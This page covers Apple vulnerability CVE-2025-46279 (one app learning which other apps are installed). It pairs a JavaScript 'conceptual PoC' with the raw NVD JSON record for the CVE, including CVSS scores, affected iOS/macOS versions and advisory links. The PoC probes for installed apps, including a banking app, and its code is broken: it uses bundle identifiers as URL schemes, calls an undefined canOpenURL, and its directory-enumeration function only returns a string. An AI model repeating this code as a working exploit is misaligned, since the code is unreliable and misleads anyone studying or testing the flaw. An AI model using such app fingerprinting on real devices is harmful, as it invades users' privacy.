CVE-2025-46279

// CVE-2025-46279 PoC - App List Enumeration via URL Schemes // Note: This is a conceptual PoC for educational purposes // Method 1: Check URL Schemes to detect installed apps function checkInstalledApps() { const targetApps = [ 'com.apple.mobilesafari', 'com.apple.Maps', 'com.apple.AppStore', 'com.apple.Music', 'com.apple.Passbook', 'com.chase.sig', 'com.google.Gmail', 'com.whatsapp.WhatsApp' ]; const installedApps = []; for (const appScheme of targetApps) { // Try to open URL scheme - if succeeds, app may be installed const testUrl = appScheme + '://'; // In vulnerable versions, this check could reveal app presence // Without proper restrictions, the app can enumerate installed apps try { // iOS-specific implementation would go here // This demonstrates the enumeration capability if (canOpenURL(testUrl)) { installedApps.push(appScheme); } } catch (error) { console.log('URL scheme check failed'); } } return installedApps; } // Method 2: System directory enumeration (if accessible) function enumerateSystemApps() { const appDirectories = [ '/Applications', '/private/var/mobile/Applications', '/System/Library/CoreServices/SpringBoard.app' ]; // In vulnerable versions, app sandboxing may not prevent this access // Attackers could read directory listings to identify apps return 'Directory enumeration attempted'; } // This PoC demonstrates the vulnerability concept // Fixed versions add proper sandboxing restrictions

{"cve": {"id": "CVE-2025-46279", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:13.340", "lastModified": "2026-04-02T19:21:02.857", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. An app may be able to identify what other apps a user has installed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "6547722A-1226-4E23-B3AE-8692B07C2657"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "8B71D919-1AA2-4F17-A834-4B703E36F7E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "8928A377-93BD-49AD-B4FE-5B2328EBDB70"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "10FD01C3-D77F-4FE4-8195-F2C59FB1321C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "E0BBFB45-21F3-4B72-8DB1-BE72AFE0D2AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EB10D901-4800-4DF9-AB35-48017C178161"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "15574823-ECE0-4394-99BC-6AFA34E599CC"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125885", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125889", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125890", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}